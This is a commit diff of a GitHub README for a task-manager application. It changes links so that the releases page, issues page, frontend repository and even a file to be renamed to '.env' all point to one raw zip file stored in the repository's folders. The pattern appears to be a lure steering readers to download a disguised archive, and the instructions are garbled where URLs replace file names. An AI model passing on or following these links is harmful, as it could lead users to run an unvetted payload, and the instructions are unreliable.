You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@@ -22,13 +22,13 @@ Before you begin, ensure your computer meets these requirements:
22
22
## 📥 Download & Install
23
23
24
24
1.**Visit the Releases Page**
25
-
Go to the [Releases Page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip) to download the application.
25
+
Go to the [Releases Page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip) to download the application.
26
26
27
27
2.**Choose the Latest Version**
28
28
Find the latest release on the page. Click on it to view available files.
29
29
30
30
3.**Download the Files**
31
-
Look for the file named “https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip” or similar. Click the link to download it to your computer.
31
+
Look for the file named “https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip” or similar. Click the link to download it to your computer.
32
32
33
33
4.**Extract the Zip File**
34
34
Locate the downloaded zip file in your downloads folder. Right-click on it and choose “Extract All” to unzip it.
@@ -43,7 +43,7 @@ Before you begin, ensure your computer meets these requirements:
43
43
```
44
44
45
45
7.**Set Up the Environment**
46
-
Rename the `https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip` file to `.env`. Open this file in a text editor. Update the database credentials as needed:
46
+
Rename the `https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip` file to `.env`. Open this file in a text editor. Update the database credentials as needed:
47
47
-`DB_CONNECTION=pgsql`
48
48
-`DB_HOST=127.0.0.1`
49
49
-`DB_PORT=5432`
@@ -86,16 +86,16 @@ To learn how to use the API, refer to the API documentation once the server is r
86
86
87
87
## 📚 Support and Contribution
88
88
89
-
If you need help or have questions, visit our [issues page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip). For contributions, feel free to create a pull request after reviewing our contribution guidelines.
89
+
If you need help or have questions, visit our [issues page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip). For contributions, feel free to create a pull request after reviewing our contribution guidelines.
90
90
91
91
---
92
92
93
93
## 📦 Additional Information
94
94
95
95
This application is designed for users who want a straightforward task management solution. With a simple interface and reliable backend, you can manage your tasks with ease.
96
96
97
-
If you want to see how the frontend connects to this backend, check out the [Frontend Repository Here](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip).
97
+
If you want to see how the frontend connects to this backend, check out the [Frontend Repository Here](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip).
98
98
99
99
For any further queries or suggestions, please open an issue on GitHub. Thank you for using our Task Manager application!
0 commit comments